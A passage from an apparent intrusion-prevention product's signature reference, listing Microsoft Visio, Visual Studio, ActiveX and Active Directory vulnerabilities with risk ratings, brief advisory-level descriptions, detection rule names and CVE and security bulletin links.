First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visio 2003; Microsoft Visio 2007; Microsoft Visio 2010
Type: Malfunction
Description: There is a vulnerability in Microsoft Visio.
Situation: File-TextId_Microsoft-Visio-External-Entities-Resolution-Vulnerability-2
File-TextId_Microsoft-Visio-External-Entities-Resolution-Vulnerability
References:
CVE-2013-1301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1301
MS13-044
http://technet.microsoft.com/security/bulletin/MS13-044
Back to top

Microsoft-Visio-Insecure-Library-Loading-Vulnerability-CVE-2010-3148

About this vulnerability: A vulnerability in Microsoft Visio
Risk: High
First detected in: sgpkg-ips-403-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visio 2003
Type: Malfunction
Description: There is a vulnerability in Microsoft Visio.
Situation: HTTP_CSU-Microsoft-Visio-Insecure-Library-Loading-CVE-2010-3148
References:
CVE-2010-3148
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3148
MS11-055
http://technet.microsoft.com/security/bulletin/MS11-055
Back to top

Microsoft-Visio-Version-Number-Handling-Code-Execution

About this vulnerability: A vulnerability in Microsoft Visio
Risk: High
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visio
Type: Input Validation
Description: There is a remote code-execution vulnerability in Microsoft Visio. The vulnerability is due to insufficient validating of user-supplied data while processing Version Number. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted Microsoft Visio file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: HTTP_Microsoft-Visio-Version-Number-Handling-Code-Execution
File-OLE_Microsoft-Visio-Version-Number-Handling-Code-Execution
References:
CVE-2007-0934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0934
BID-24349
http://www.securityfocus.com/bid/24349
OSVDB-35342
http://www.osvdb.org/35342
MS07-030
http://technet.microsoft.com/security/bulletin/MS07-030
Back to top

Microsoft-Visio-Viewer-VSD-File-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Office Visio Viewer
Risk: High
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visio Viewer
Type: Malfunction
Description: A memory corruption vulnerability has been reported in Microsoft Visio Viewer. The vulnerability is due to the way the application performs validation on attributes when handling certain Visio files. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a malicious file with a vulnerable version of the application. This can lead to code execution in the context of the affected user.
Situation: File-OLE_Microsoft-Visio-Viewer-VSD-File-Memory-Corruption
References:
CVE-2012-0018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0018
BID-53328
http://www.securityfocus.com/bid/53328
OSVDB-81731
http://www.osvdb.org/81731
MS12-031
http://technet.microsoft.com/security/bulletin/MS12-031
Back to top

Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0019

About this vulnerability: Code execution vulnerability in Microsoft Visio Viewer
Risk: Moderate
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visio Viewer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Visio Viewer
Situation: File-OLE_Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0019
References:
CVE-2012-0019
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0019
MS12-015
http://technet.microsoft.com/security/bulletin/MS12-015
Back to top

Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0020

About this vulnerability: Code execution vulnerability in Microsoft Visio Viewer
Risk: Moderate
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1396-5242
Platform: Windows
Software: Microsoft Visio Viewer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Visio Viewer
References:
CVE-2012-0020
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0020
OSVDB-79255
http://www.osvdb.org/79255
MS12-015
http://technet.microsoft.com/security/bulletin/MS12-015
Back to top

Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0136

About this vulnerability: Code execution vulnerability in Microsoft Visio Viewer
Risk: Moderate
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visio Viewer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Visio Viewer
Situation: File-OLE_Microsoft-Visio-VSD-File-Format-Memory-Corruption-CVE-2012-0136
References:
CVE-2012-0136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0136
MS12-015
http://technet.microsoft.com/security/bulletin/MS12-015
Back to top

Microsoft-Visual-Basic-Common-ActiveX-Control-AVI-Parsing

About this vulnerability: Memory corruption vulnerability in Microsoft Visual Basic runtime
Risk: High
First detected in: sgpkg-ips-193-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft Visual Basic
Type: Malfunction
Description: There is a buffer overflow vulnerability in Microsoft Visual Basic runtime. An ActiveX control included in the runtime package suffers from a buffer overflow vulnerability when parsing AVI video files. A crafted AVI file may allow a remote attacker to execute arbitrary code in the context of the current user.
Situation: HTTP_SS-Microsoft-Visual-Basic-Common-ActiveX-Control-AVI-Parsing
File-RIFF_Microsoft-Visual-Basic-Common-ActiveX-Control-AVI-Parsing
References:
CVE-2008-4255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4255
BID-32613
http://www.securityfocus.com/bid/32613
MS08-070
http://technet.microsoft.com/security/bulletin/MS08-070
Back to top

Microsoft-Visual-Basic-Enterprise-Vb6stkit.dll-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Visual Basic
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visual Basic; Microsoft Visual Studio
Type: Malfunction
Description: There is a buffer overlfow vulnerability in the Vb6stkit.dll ActiveX control included with Microsoft Visual Basic. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious web page, potentially allowing arbitrary code to be executed in the security context of the currently logged in user.
Situation: HTTP_SS-Microsoft-Visual-Basic-Vb6stkiy.dll-ActiveX-Control-BOF
File-TextId_Microsoft-Visual-Basic-Vb6stkiy.dll-ActiveX-Control-BOF
References:
CVE-2008-2959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2959
BID-29792
http://www.securityfocus.com/bid/29792
Back to top

Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Integer-Overflow

About this vulnerability: A vulnerability in Microsoft Visual Basic (Runtime Extended Files)
Risk: High
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visual Basic; Microsoft Visual FoxPro
Type: Integer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Visual Basic runtime. The vulnerability is due to a boundary error in an animation ActiveX control while opening a specially crafted audio/video file. Remote attackers can exploit this vulnerability by enticing the target user to visit a malicious web page, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user.
Situation: HTTP_SS-Microsoft-Killbit-Disabled-ActiveX-Object
HTTP_SS-Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Integer-Overflow
File-Text_Microsoft-Killbit-Disabled-ActiveX-Object
File-Text_Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Integer-Overflow
References:
CVE-2008-4254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4254
BID-32612
http://www.securityfocus.com/bid/32612
MS08-070
http://technet.microsoft.com/security/bulletin/MS08-070
Back to top

Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Microsoft Visual Basic
Risk: High
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft FrontPage; Microsoft Project; Microsoft Visual Basic; Microsoft Visual FoxPro
Type: Malfunction
Description: There is a memory corruption vulnerability in the Microsoft Visual Basic runtime. The runtime is included in multiple Microsoft products. The runtime suffers improper memory initialization when the FlexGrid ActiveX control is loaded in a web page. Remote attackers can exploit this vulnerability by enticing the target user to visit a malicious web page, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user.
Situation: HTTP_SS-Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Memory-Corruption
File-Text_Microsoft-Visual-Basic-Flexgrid-ActiveX-Control-Memory-Corruption
References:
CVE-2008-4253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4253
BID-32592
http://www.securityfocus.com/bid/32592
MS08-070
http://technet.microsoft.com/security/bulletin/MS08-070
Back to top

Microsoft-Visual-Foxpro-Fpole.ocx-ActiveX-Control-BOF

About this vulnerability: A vulnerability in fpole library.
Risk: High
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Buffer Overflow
Description: Buffer overflow vulnerabilities exists in certain ActiveX controls used by Internet Explorer. The vulnerabilities are remotely exploitable. Vulnerabilities are explained in MS08-010. Fixes are also available from Microsoft.
Situation: HTTP_SS-Microsoft-Visual-Foxpro-Fpole.ocx-ActiveX-Control-Buffer-Overflow
File-Text_Microsoft-Visual-Foxpro-Fpole.ocx-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-4790
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4790
BID-25571
http://www.securityfocus.com/bid/25571
MS08-010
http://technet.microsoft.com/security/bulletin/MS08-010
Back to top

Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Command-Injection

About this vulnerability: A vulnerability in Microsoft Visual Studio Code - Maven for Java
Risk: Moderate
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1369-5242
Platform: Windows
Software: Microsoft Visual Studio Code
Type: Input Validation
Description: The Maven for Java Extension for Microsoft Visual Studio Code validates user input improperly, causing a command injection vulnerability. A successful attack allows an attacker to execute arbitrary commands with the privileges of the target process.
Situation: File-Text_Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Command-Injection
References:
CVE-2021-28472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28472
Back to top

Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Visual Studio Code
Risk: Moderate
First detected in: sgpkg-ips-1333-5242
Last changed: sgpkg-ips-1333-5242
Platform: Windows
Software: Microsoft Visual Studio
Type: Malfunction
Description: There exists a remote code execution vulnerability in the "Maven for Java" extension for Microsoft Visual Studio Code. Successful exploitation could lead in arbitrary code execution.
Situation: File-Text_Microsoft-Visual-Studio-Code-Maven-For-Java-Extension-Remote-Code-Execution
References:
CVE-2021-27084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27084
Back to top

Microsoft-Visual-Studio-Code-Remote-Containers-Extension-RCE

About this vulnerability: A vulnerability in Code Remote - Containers.
Risk: High
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Platform: Windows
Software: Microsoft Visual Studio
Type: Malfunction
Description: A vulnerability in Microsoft Visual Studio Code Remote - Containers Extension, versions prior to 0.177.1, which allows remote attackers to execute arbitrary code by enticing a user to clone a malicious repository in a Docker volume, due a design weakness in how cloning a repository in a Docker volume can allow code execution from that repository without the user being aware.
Situation: HTTP_CS-Microsoft-Visual-Studio-Code-Remote-Containers-Extension-RCE
References:
CVE-2021-31213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31213
Back to top

Microsoft-Visual-Studio-Code-Remote-Containers-Extension-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Visual Studio Code Remote - Containers Extension
Risk: Moderate
First detected in: sgpkg-ips-1334-5242
Last changed: sgpkg-ips-1334-5242
Platform: Windows
Software: Microsoft Visual Studio Code
Type: Malfunction
Description: Insufficient validation of the configuration of the Remote Containers Extension causes a remote code execution vulnerability in Microsoft Visual Studio Code. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-Text_Microsoft-Visual-Studio-Code-Remote-Containers-Extension-Remote-Code-Execution
File-Member-Name_Microsoft-Visual-Studio-Code-Remote-Containers-Extension-Remote-Code-Execution
References:
CVE-2021-27083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27083
Back to top

Microsoft-Visual-Studio-DDS-File-Parsing-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Visual Studio
Risk: High
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Platform: Windows
Software: Microsoft Visual Studio
Type: Buffer Overflow
Description: A remote code execution vulnerability exists in Microsoft Visual Studio. The vulnerability is due to improper handling of DDS files. A remote attacker can exploit these vulnerabilities by enticing a target user into opening a crafted DDS file. Successful exploitation could result in the execution of arbitrary code under the security context of the target user.
Situation: File-Binary_Microsoft-Visual-Studio-DDS-File-Parsing-Heap-Buffer-Overflow
References:
CVE-2021-36952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36952
ms21-sep
http://technet.microsoft.com/security/bulletin/ms21-sep
Back to top

Microsoft-Visual-Studio-MFC-Insecure-Library-Loading

About this vulnerability: An attempt to exploit vulnerability in Microsoft Visual Studio detected
Risk: Moderate
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: Microsoft Visual Studio
Type: Malfunction
Description: A code execution vulnerability exists in Microsoft Visual Studio Foundation Classes (MFC). The vulnerability is due to a design weakness when MFC attempts to load a specific DLL upon running an MFC-compiled executable.
Situation: SMB-TCP_CHS_Microsoft-Visual-Studio-MFC-Insecure-Library-Loading
References:
CVE-2010-3190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3190
MS11-025
http://technet.microsoft.com/security/bulletin/MS11-025
Back to top

Microsoft-Visual-Studio-MSMASK32.OCX-ActiveX-Control-BOF

About this vulnerability: Buffer overflow vulnerability in the Microsoft Visual Studio Msmask32.ocx ActiveX control
Risk: High
First detected in: sgpkg-ips-171-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visual Studio
Type: Buffer Overflow
Description: There is a buffer overflow in the Microsoft Visual Studio Msmask32.ocx ActiveX control. The vulnerability is due to a boundary error while handling an excessively long string assigned to the Mask property. A remote attacker can exploit the vulnerability by enticing a user to visit a malicious web page. Successful exploitation leads to a termination of Internet Explorer or non-privileged arbitrary code execution.
Situation: HTTP_SS-Microsoft-Visual-Studio-MSMASK32.OCX-ActiveX-Control-BOF
File-Text_Microsoft-Visual-Studio-MSMASK32.OCX-ActiveX-Control-BOF
References:
CVE-2008-3704
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3704
BID-30674
http://www.securityfocus.com/bid/30674
OSVDB-47475
http://www.osvdb.org/47475
MS08-070
http://technet.microsoft.com/security/bulletin/MS08-070
Back to top

Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Code-Execution

About this vulnerability: A vulnerability in Microsoft Visual Studio and Visual Basic
Risk: High
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visual Basic; Microsoft Visual Studio
Type: Malfunction
Description: There is an access control weakness vulnerability in the PDWizard ActiveX control included with Microsoft Visual Basic and Visual Studio. The vulnerability is the result of insufficient data validation while processing the StartProcess method call from a script embedded into a web page. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious web page, potentially allowing arbitrary code to be executed in the security context of the currently logged in user.
Situation: HTTP_SS-Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Code-Execution
File-Text_Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Code-Execution
References:
CVE-2007-4891
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4891
BID-25638
http://www.securityfocus.com/bid/25638
OSVDB-37106
http://www.osvdb.org/37106
Back to top

Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Visual Basic and Visual Studio
Risk: High
First detected in: sgpkg-ips-142-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visual Basic; Microsoft Visual Studio
Type: Malfunction
Description: There is a remote code execution vulnerability in Microsoft's ActiveX control pdwizard.ocx, distributed with Microsoft Visual Studio and Microsoft Visual Basic. The vulnerability is due to memory corruption that occurs when the affected control is instantiated in Internet Explorer. A remote attacker can exploit this vulnerability by enticing the target user to open a crafted web page, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user.
Situation: HTTP_SS-Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Memory-Corruption
File-Text_Microsoft-Visual-Studio-PDWizard.ocx-ActiveX-Control-Memory-Corruption
References:
CVE-2007-3041
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3041
BID-25295
http://www.securityfocus.com/bid/25295
OSVDB-36395
http://www.osvdb.org/36395
MS07-045
http://technet.microsoft.com/security/bulletin/MS07-045
Back to top

Microsoft-Visual-Studio-Project-Name-BOF

About this vulnerability: A buffer overflow vulnerability in Microsoft Visual Studio
Risk: High
First detected in: sgpkg-ips-214-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visual Studio
Type: Buffer Overflow
Description: There exists a stack based buffer overflow vulnerability in Microsoft Visual Studio. The flaw is caused by improper boundary checks when processing overly long project name strings contained in Database Project (.dbp) files and Solution (.sln) files. An attacker exploiting this vulnerability can inject and execute arbitrary code within the security context of the currently logged in user.
Situation: HTTP_SS-Microsoft-Visual-Studio-Project-Name-BOF
File-TextId_Microsoft-Visual-Studio-Project-Name-BOF
References:
CVE-2006-1043
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1043
BID-16953
http://www.securityfocus.com/bid/16953
OSVDB-23711
http://www.osvdb.org/23711
Back to top

Microsoft-Visual-Studio-Python-Interpreter-RCE

About this vulnerability: A vulnerability in Microsoft Visual Studio.
Risk: High
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1363-5242
Platform: Windows
Software: Microsoft Visual Studio
Type: Insecure Configuration
Description: A vulnerability in Microsoft Visual Studio 2019, versions prior to 16.9.5, which allows remote attackers to execute remote code by sending a malicious project/workspace with a specially crafted python.exe file in a subdirectory.
Situation: File-Zip_Microsoft-Visual-Studio-Python-Interpreter-RCE
References:
CVE-2021-27068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27068
Back to top

Microsoft-Visual-Studio-Team-Web-Access-Console-Vulnerability

About this vulnerability: A vulnerability in Microsoft Visual Studio Team Web Access console
Risk: High
First detected in: sgpkg-ips-476-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Visual Studio 2010
Type: Code Injection
Description: There is a vulnerability in Microsoft Visual Studio Web access console.
Situation: HTTP_CRL-Microsoft-Visual-Studio-Team-Web-Access-Console-Vulnerability
References:
CVE-2012-1892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1892
BID-55409
http://www.securityfocus.com/bid/55409
OSVDB-85315
http://www.osvdb.org/85315
MS12-061
http://technet.microsoft.com/security/bulletin/MS12-061
Back to top

Microsoft-VM-ActiveX-Component-Vulnerability

About this vulnerability: There is a code execution vulnerability in Microsoft VM ActiveX control
Risk: High
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft VM
Type: Malfunction
Description: There is a remote code execution vulnerability in Microsoft VM ActiveX control. Microsoft's Java virtual machine allows access to a restricted ActiveX control from scripts. This can lead to code execution in the context of the current user.
Situation: HTTP_Microsoft-VM-ActiveX-Component-Vulnerability
File-Text_Microsoft-VM-ActiveX-Component-Vulnerability
References:
CVE-2000-1061
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1061
BID-1754
http://www.securityfocus.com/bid/1754
MS00-075
http://technet.microsoft.com/security/bulletin/MS00-075
Back to top

Microsoft-VSCode-Markdown-Preview-Enhanced-Extension-Command-Injection

About this vulnerability: A vulnerability in Microsoft Visual Studio Code - Markdown Preview Enhanced Extension
Risk: Moderate
First detected in: sgpkg-ips-1549-5242
Last changed: sgpkg-ips-1549-5242
Platform: Generic
Software: Microsoft Visual Studio Code
Type: Input Validation
Description: Improper input validation in the PDF import functionality in Markdown files causes a command injection vulnerability in Microsoft Visual Studio Code. A successful exploit allows an attacker to execute arbitrary commands on the target system.
Situation: File-Text_Microsoft-Visual-Studio-Code-Markdown-Preview-Enhanced-Extension-Command-Injection
References:
CVE-2022-45025
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45025
Back to top

Microsoft-Windows-2000-Domain-Authentication-Bypass

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Low
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Insecure Configuration
Description: There is a vulnerability within the authentication mechanism within Microsoft Windows 2000 that may allow a user with an expired Windows account to log in to a domain.
Situation: Generic_UDP-Microsoft-Windows-2000-Domain-Authentication-Bypass
References:
CVE-2004-0540
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0540
Back to top

Microsoft-Windows-Active-Directory-Browser-Election-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Active Directory
Risk: High
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2003
Software: <os>
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability exists in Microsoft Windows Server 2003 Active Directory.
Situation: Generic_UDP-Microsoft-Windows-Active-Directory-Browser-Election-Buffer-Overflow
NetBIOS-UDP_CS-Microsoft-Windows-Active-Directory-Browser-Election-BOF
References:
CVE-2011-0654
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0654
BID-46360
http://www.securityfocus.com/bid/46360
OSVDB-70881
http://www.osvdb.org/70881
MS11-019
http://technet.microsoft.com/security/bulletin/MS11-019
Back to top

Microsoft-Windows-Active-Directory-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Active Directory
Risk: Moderate
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: Microsoft Windows Active Directory buffer overflow.
Situation: LDAP_CS-Windows-Active-Directory-Buffer-Overflow
References:
CVE-2007-0040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0040
BID-24800
http://www.securityfocus.com/bid/24800
MS07-039
http://technet.microsoft.com/security/bulletin/MS07-039
Back to top

Microsoft-Windows-Active-Directory-Certificate-Services-CVE-2011-1264

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-397-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2003; Windows 2008; Windows 2008 R2
Software: <os>
Type: Cross-site Scripting
Description: There is a vulnerability in Microsoft Windows.
Situation: HTTP_CRL-Microsoft-Windows-Active-Directory-Certificate-Services-CVE-2011-1264
References:
CVE-2011-1264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1264
MS11-051
http://technet.microsoft.com/security/bulletin/MS11-051
Back to top

Microsoft-Windows-Active-Directory-Crafted-LDAP-Request-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There is a heap overflow vulnerability in the way Microsoft Windows Active Directory handles LDAP messages. The vulnerability is due to lack of validation for entry length in the LDAP modify message. Remote unauthenticated attackers can exploit this vulnerability to inject and execute arbitrary code on the affected target with System level privileges. If code injection attack is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security of the affected process, the System account. In an attack case where code injection is not successful, the Active Directory process, lsass.exe, will terminate abnormally, causing the entire system to shutdown and creating a denial of service condition.
Situation: LDAP_CS-Microsoft-Windows-Active-Directory-Crafted-LDAP-Request-Buffer-Overflow
References:
CVE-2007-0040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0040
BID-24800
http://www.securityfocus.com/bid/24800
OSVDB-35960
http://www.osvdb.org/35960
MS07-039
http://technet.microsoft.com/security/bulletin/MS07-039
Back to top

Microsoft-Windows-Active-Directory-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a denial of service vulnerability in Microsoft Windows Active Directory. The vulnerability is due to insufficient check during the processing of LDAP searchRequest. By sending crafted messages to a target server, an unauthenticated attacker may exploit this vulnerability to cause the affected system to stop responding, creating a denial of service condition.
Situation: LDAP_CS-Microsoft-Windows-Active-Directory-Denial-Of-Service
References:
CVE-2008-1445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1445
BID-29584
http://www.securityfocus.com/bid/29584
MS08-035
http://technet.microsoft.com/security/bulletin/MS08-035
Back to top

Microsoft-Windows-Active-Directory-Integrated-DNS-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows Server
Risk: High
First detected in: sgpkg-ips-1285-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Windows Server
Type: Buffer Overflow
Description: A remote code execution vulnerability has been reported in the Active Directory Integrated DNS (ADIDNS) component of Microsoft Windows. The vulnerability is due to insufficient handling of certain requests handled by ADIDNS. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of arbitrary code as SYSTEM.
Situation: LDAP_CS-Microsoft-Windows-Active-Directory-Integrated-DNS-Remote-Code-Execution
References:
CVE-2020-0718
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0718
ms20-sep
http://technet.microsoft.com/security/bulletin/ms20-sep
Back to top

Microsoft-Windows-Active-Directory-LDAP-Parsing-Memory-Corruption

About this vulnerability: A parsing vulnerability in Microsoft Active Directory LDAP handling
Risk: Moderate
First detected in: sgpkg-ips-348-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Microsoft Windows Active Directory LDAP parsing memory corruption vulnerability.
Situation: LDAP_CS-Windows-Active-Directory-Parsing-Memory-Corruption
References:
CVE-2009-1138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1138
BID-35226
http://www.securityfocus.com/bid/35226
OSVDB-54937
http://www.osvdb.org/54937
MS09-018
http://technet.microsoft.com/security/bulletin/MS09-018
Back to top

Microsoft-Windows-Active-Directory-Ldaps-Authentication-Bypass

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There is an authentication bypass vulnerability in Microsoft Windows Active Directory, Active Directory Application Mode (ADAM), and Active Directory Lightweight Directory Service (AD LDS). The vulnerability is due to insufficient validation of the revocation status of an SSL certificate against the CRL associated with the domain account when processing LDAPS requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a previously revoked certificate to the LDAP server to authenticate against the Active Directory domain. Successful exploitation will result in authentication against the LDAP server. Please note that the vulnerability exists only when the Active Directory is configured to use LDAP over SSL (LDAPS) which is not the case in the default configuration.
Situation: LDAP_CS-Microsoft-Windows-Active-Directory-Ldaps-Authentication-Bypass
References:
CVE-2011-2014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2014
MS11-086
http://technet.microsoft.com/security/bulletin/MS11-086
Back to top

Microsoft-Windows-ActiveX-Data-Objects-Code-Execution

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1176-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ActiveX
Type: Malfunction
Description: A code execution vulnerability has been reported in Microsoft Windows ActiveX Data Objects (ADO). The vulnerability is due to improper handling of an object. A remote attacker could exploit this vulnerability by enticing a user to open a specially crafted file. Successful exploitation could result in the execution of arbitrary code as the victim user privileges.
Situation: File-Text_Microsoft-Windows-ActiveX-Data-Objects-Code-Execution
References:
CVE-2019-0888
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0888
Back to top

Microsoft-Windows-Address-Book-Contact-File-Parsing-CVE-2020-1410

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1264-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A vulnerability in the Address Book component of Microsoft Windows.
Situation: File-TextId_Microsoft-Windows-Address-Book-Contact-File-Parsing-CVE-2020-1410
References:
CVE-2020-1410
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1410
Back to top

Microsoft-Windows-Address-Book-Insecure-Library-Loading-CVE-2010-3147

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 7; Windows 2008; Windows Vista; Windows 2008
Software: <os>
Type: Malfunction
Description: There is a vulnerability in Microsoft Windows.
Situation: HTTP_CSU-Microsoft-Windows-Address-Book-Insecure-Library-Loading-CVE-2010-3147
References:
CVE-2010-3147
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3147
MS10-096
http://technet.microsoft.com/security/bulletin/MS10-096
Back to top

Microsoft-Windows-ADIDNS-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows Server.
Risk: High
First detected in: sgpkg-ips-1370-5242
